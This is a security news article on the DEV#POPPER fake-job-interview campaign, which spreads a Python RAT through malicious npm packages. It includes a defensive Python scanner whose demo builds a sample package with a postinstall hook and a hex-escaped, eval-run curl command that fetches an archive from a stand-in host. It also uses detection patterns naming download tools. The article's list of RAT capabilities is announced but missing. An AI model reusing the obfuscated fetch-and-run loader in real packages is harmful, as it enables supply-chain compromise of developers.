Cybersecurity company Securonix has discovered a new ongoing social engineering attack campaign that targets software developers with bogus npm packages on the pretext of fake job interviews and tricks them into downloading a Python-based remote access trojan (RAT).

Based on the observed tactics, the Securonix Threat Research Team, which tracks the activity as DEV#POPPER, has linked the campaign to suspected North Korean threat actors.

During these fraudulent interviews, the developers are often asked to perform tasks that involve downloading and running software from sources that appear legitimate, such as GitHub.


"The software contained a malicious Node JS payload that, once executed, compromised the developer's system," said security researchers Den Iuzvyk, Tim Peck, and Oleg Kolesnikov in a blog post.

The threat actor's aim is to deceive targets into downloading malicious software that collects system information and enables remote access to the host.

In the first stage, the interviewer (the attacker) sends the interviewee (the developer) a zip archive hosted on GitHub, disguised as material for a software developer position, and asks them to download it.


The archive contains a legitimate-looking Node Package Manager (NPM) package with a README.md and Frontend and Backend directories.

Once the developer executes the malicious NPM package, an obfuscated JavaScript file (imageDetails.js) is executed through the NodeJS process (node.exe) using curl commands.

The malicious script's purpose in the first stage is simply to download an additional archive (p.zi) from an external server.

Inside the archive is the next stage payload, a hidden Python file (.npl) that functions as a RAT.

Depending on the operating system's settings, this Python file may or may not be hidden from the user's view.
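The stages above (an NPM package that runs an obfuscated loader, which shells out to curl to fetch an archive containing a hidden ".npl" script) are exactly what a developer can check for before running an "interview task" with `npm install`. The script below is an added example written for this article, not Securonix's tooling or the campaign's code: it walks an unpacked package and reports lifecycle hooks that execute automatically at install time, hex-escaped or eval-based JavaScript that invokes a download tool, external URLs, and hidden or oddly named files. The sample package it builds is constructed for the demo (the `example.invalid` host is a reserved name), and the thresholds and extension list are assumptions rather than published indicators.

```python
"""Pre-install triage of an npm package received as an "interview task".

Added example, not the campaign's code or Securonix's tooling. Heuristics,
thresholds and the sample package are assumptions constructed for the demo.
"""
import json
import os
import re
import tempfile
from pathlib import Path

# Hooks npm runs automatically during `npm install` (real npm behaviour).
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")
# Assumed heuristics for this example; tune to your environment.
SHELL_FETCH = re.compile(r"\b(curl|wget|Invoke-WebRequest|certutil)\b", re.I)
EXEC_API = re.compile(r"child_process|\beval\s*\(|new\s+Function\s*\(")
HEX_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")
REMOTE_URL = re.compile(r"https?://[^\s'\"]+")
SUSPICIOUS_SUFFIXES = (".npl", ".zi")  # names from the article; extend as needed
ALLOWED_DOTFILES = {".gitignore", ".npmignore", ".npmrc", ".eslintrc"}


def decode_hex_escapes(text: str) -> str:
    """Undo the simplest string obfuscation (\\x41 -> 'A') before matching."""
    return HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), text)


def scan_js(path: Path, rel: str) -> list:
    text = path.read_text(errors="replace")
    decoded = decode_hex_escapes(text)
    findings = []
    if any(len(line) > 1000 for line in text.splitlines()):
        findings.append(f"{rel}: very long line (minified or obfuscated code)")
    if len(HEX_ESCAPE.findall(text)) > 20:
        findings.append(f"{rel}: heavy \\x escaping (string obfuscation)")
    if EXEC_API.search(decoded):
        findings.append(f"{rel}: dynamic code execution or child_process use")
    if SHELL_FETCH.search(decoded):
        findings.append(f"{rel}: invokes a download tool")
    for url in REMOTE_URL.findall(decoded):
        if "registry.npmjs.org" not in url:
            findings.append(f"{rel}: references external host {url}")
    return findings


def scan_manifest(path: Path) -> list:
    try:
        scripts = json.loads(path.read_text()).get("scripts") or {}
    except (OSError, ValueError):
        return ["package.json: unreadable or invalid JSON"]
    findings = []
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        # Anything that runs at install time deserves a read before `npm install`.
        if cmd and (SHELL_FETCH.search(cmd) or REMOTE_URL.search(cmd) or "node " in cmd):
            findings.append(f"package.json: '{hook}' runs automatically on install: {cmd}")
    return findings


def scan_npm_package(root) -> list:
    root = Path(root)
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d != "node_modules"]
        for name in filenames:
            path = Path(dirpath) / name
            rel = str(path.relative_to(root))
            # Path('.npl').suffix is '', so match on the name, not on suffix.
            if name.startswith(".") and name not in ALLOWED_DOTFILES:
                findings.append(f"{rel}: hidden file shipped in package")
            if name.lower().endswith(SUSPICIOUS_SUFFIXES):
                findings.append(f"{rel}: unusual file type for an npm package")
            if name == "package.json":
                findings.extend(scan_manifest(path))
            elif name.endswith((".js", ".cjs", ".mjs")):
                findings.extend(scan_js(path, rel))
    return findings


def build_sample_package(base) -> Path:
    """Constructed look-alike of the layout the article describes (not the real package)."""
    root = Path(base) / "interview-task"
    (root / "Frontend").mkdir(parents=True)
    (root / "Backend").mkdir()
    (root / "README.md").write_text("# Coding challenge\n\nRun `npm install && npm start`.\n")
    (root / "package.json").write_text(json.dumps({
        "name": "interview-task", "version": "1.0.0",
        "scripts": {"postinstall": "node Backend/imageDetails.js",
                    "start": "node Backend/index.js"}}))
    (root / "Frontend" / "app.js").write_text("export const greet = (n) => `hi ${n}`;\n")
    # Stand-in for an obfuscated loader: the shell command is hex-escaped and
    # passed through eval. Reserved .invalid host; this is demo data only.
    hidden_cmd = "".join(f"\\x{ord(c):02x}" for c in "curl http://example.invalid/p.zi -o p.zi")
    (root / "Backend" / "imageDetails.js").write_text(
        "var cp=require('child_process');eval(\"cp.execSync('" + hidden_cmd + "')\");\n")
    (root / "Backend" / ".npl").write_text("# placeholder for a hidden second-stage script\n")
    return root


def demo() -> list:
    """Build the constructed package in a temp dir, scan it, return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        return scan_npm_package(build_sample_package(tmp))
```

Run `python -c "import triage; print(*triage.demo(), sep='\n')"` (or call `scan_npm_package` on a real unpacked archive) and read the output before installing anything. The benign `Frontend/app.js` produces no findings; the `postinstall` hook, the hex-escaped curl command with its external URL, and the hidden `.npl` file each do. The decode step matters: a plain grep for "curl" misses a string that is spelled out as `\x63\x75...`, which is why the scan matches on the decoded text.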

Once the RAT is active on the victim's system, it collects system and connection information from the infected computer and sends it to the command and control (C2) server, including the operating system, hostname, OS release version, OS version, the username of the logged-in user, and a unique identifier for the machine (uuid) generated by hashing the MAC address and username.

According to Securonix analysts, the RAT supports the following capabilities:

"When it comes to attacks which originate through social engineering, it's critical to maintain a security-focused mindset, especially during intense and stressful situations like job interviews," the researchers added.

The attackers behind the DEV#POPPER campaigns abuse this, knowing that the person on the other end is highly distracted and in a much more vulnerable state.

Securonix recommends people remain extra vigilant, as fake job opportunities are often used as bait to infect people with malware.

In the first campaign, Contagious Interview, threat actors posed as employers to lure software developers into installing malware through an interview process that created the potential for various types of theft.

On the other hand, the second campaign, Wagemole, sought unauthorized employment with organizations based in the U.S. and other parts of the world, with potential for both financial gain and espionage.


source: www.techworm.net